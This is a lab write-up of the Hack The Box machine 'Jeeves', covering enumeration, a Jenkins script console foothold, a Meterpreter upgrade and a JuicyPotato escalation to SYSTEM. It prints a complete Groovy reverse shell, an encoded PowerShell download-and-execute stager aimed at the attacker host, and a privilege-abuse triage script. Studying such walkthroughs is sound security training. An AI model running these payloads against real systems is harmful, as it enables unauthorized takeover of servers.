Jeeves

Initial nmap

sudo nmap -sS -sV -Pn -n --disable-arp-ping -v -T4 -p- 10.10.10.63

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Dirbusting the Jetty service with Gobuster finds a directory “/askjeeves/” that serves a Jenkins instance reachable with no credentials at all:

gobuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt dir -u http://10.10.10.63:50000/ -t 100
http://10.10.10.63:50000/askjeeves/

Reverse shell via the Jenkins script console (/askjeeves/script), which evaluates arbitrary Groovy on the server as the account Jenkins runs under:

// Spawn cmd.exe and wire its stdin/stdout/stderr to a socket back to the attacker
String host="10.10.14.27";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// Pump bytes in both directions until the socket closes or cmd.exe exits
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
}
p.destroy();s.close();

listening on [any] 4444 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

Listing the user's privileges shows SeImpersonatePrivilege is enabled, which indicates that this system may be vulnerable to a Potato-style token impersonation attack:

C:\Users\Administrator\.jenkins>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
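
whoami /priv output is easy to skim past, so here is an added Python helper (not part of the original writeup) that parses the table and flags the privileges worth chasing. The sample input is the Jeeves output above, copied in. The privilege-to-technique map goes beyond this page: besides the SeImpersonatePrivilege to Potato mapping the writeup relies on, it lists the other token privileges that commonly lead to SYSTEM, which is general knowledge rather than anything checked on this box. It deliberately reports Disabled entries too, because a privilege that shows as Disabled is still held by the token and can be enabled with AdjustTokenPrivileges; only its absence from the list rules it out.

```python
"""Triage `whoami /priv` output for privileges that commonly lead to SYSTEM.

Added example, not from the original writeup.  SAMPLE is the whoami /priv
output from the Jeeves shell above; INTERESTING is a general mapping of token
privileges to their usual abuse path.
"""
import re

# Constructed sample: the table as printed by whoami /priv on Jeeves.
SAMPLE = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# Privileges worth flagging and the abuse path each usually enables.
INTERESTING = {
    "SeImpersonatePrivilege": "Potato-family token impersonation (RottenPotato/JuicyPotato)",
    "SeAssignPrimaryTokenPrivilege": "Potato-family token impersonation",
    "SeBackupPrivilege": "read any file (e.g. SAM/SYSTEM hives) regardless of its ACL",
    "SeRestorePrivilege": "write any file (e.g. service binaries) regardless of its ACL",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeLoadDriverPrivilege": "load an attacker-controlled kernel driver",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then rewrite its DACL",
}

# One table row: name, free-text description, then Enabled/Disabled.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege_name: (description, state)} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state)
    return privs


def triage(text):
    """Return [(privilege, state, abuse_note)] for every interesting privilege held.

    Disabled entries are reported as well: the token holds them, and a process
    can enable them with AdjustTokenPrivileges before using them.
    """
    privs = parse_privs(text)
    return [(name, privs[name][1], note) for name, note in INTERESTING.items() if name in privs]


if __name__ == "__main__":
    for name, state, note in triage(SAMPLE):
        print(f"{name:32} {state:9} -> {note}")
```

On Jeeves the only hit is SeImpersonatePrivilege (Enabled), which is exactly the precondition the Potato family needs.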

Upgrading the plain cmd.exe shell to Meterpreter makes it easy to run the Potato modules from Metasploit. The web_delivery module serves a PowerShell stager over HTTP; the one-liner it prints is run from the existing shell:

msf6 > use exploit/multi/script/web_delivery

msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  10.10.14.27      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.10.14.27      yes       The listen address (an interface may be specified)
LPORT     443              yes       The listen port

Exploit target:

Id  Name
--  ----
2   PSH

msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.27:443
[*] Using URL: http://10.10.14.27:8080/7LFZNVikGVnT4
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB1AFAAcQBzAHMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdQBQAHEAcwBzAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdQBQAHEAcwBzAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA3ADoAOAAwADgAMAAvADcATABGAFoATgBWAGkAawBHAFYAbgBUADQALwBSAHAAYQBuADkAMgBqAGkATABSAFEAVQBhAEoAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIANwA6ADgAMAA4ADAALwA3AEwARgBaAE4AVgBpAGsARwBWAG4AVAA0ACcAKQApADsA
msf6 exploit(multi/script/web_delivery) > [*] 10.10.10.63 web_delivery - Delivering AMSI Bypass (1388 bytes)
[*] 10.10.10.63 web_delivery - Delivering Payload (3524 bytes)
[*] Sending stage (175174 bytes) to 10.10.10.63
[*] Meterpreter session 1 opened (10.10.14.27:443 -> 10.10.10.63:49678) at 2021-10-16 01:45:39 -0400

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

Id  Name  Type                     Information              Connection
--  ----  ----                     -----------              ----------
1         meterpreter x86/windows  JEEVES\kohsuke @ JEEVES  10.10.14.27:443 -> 10.10.10.63:49678 (10.10.10.63)

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JEEVES\kohsuke
meterpreter >

Metasploit's local exploit suggester (post/multi/recon/local_exploit_suggester) did not return any results, which is weird because I know this machine is vulnerable. Running the offline windows-exploit-suggester.py against the host's systeminfo output flags MS16-075 as unpatched; together with SeImpersonatePrivilege being enabled, that makes a Potato attack the obvious candidate:

[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation

Back to metasploit to search for Potato attacks:

msf6 post(multi/recon/local_exploit_suggester) > search potato

Matching Modules
================

#  Name                                                 Disclosure Date  Rank    Check  Description
-  ----                                                 ---------------  ----    -----  -----------
0  exploit/windows/local/bits_ntlm_token_impersonation  2019-12-06       great   Yes    SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
1  exploit/windows/local/ms16_075_reflection            2016-01-16       normal  Yes    Windows Net-NTLMv2 Reflection DCOM/RPC
2  exploit/windows/local/ms16_075_reflection_juicy      2016-01-16       great   Yes    Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)

Neither “bits_ntlm_token_impersonation” nor “ms16_075_reflection” produced a session, but the JuicyPotato variant, “ms16_075_reflection_juicy”, escalates us to SYSTEM:

msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 10.10.14.27:5555
[+] Target appears to be vulnerable (Windows 10 (10.0 Build 10586).)
[*] Launching notepad to host the exploit...
[+] Process 2740 launched.
[*] Reflectively injecting the exploit DLL into 2740...
[*] Injecting exploit into 2740...
[*] Exploit injected. Injecting exploit configuration into 2740...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.63
[*] Meterpreter session 2 opened (10.10.14.27:5555 -> 10.10.10.63:49687) at 2021-10-16 02:09:36 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM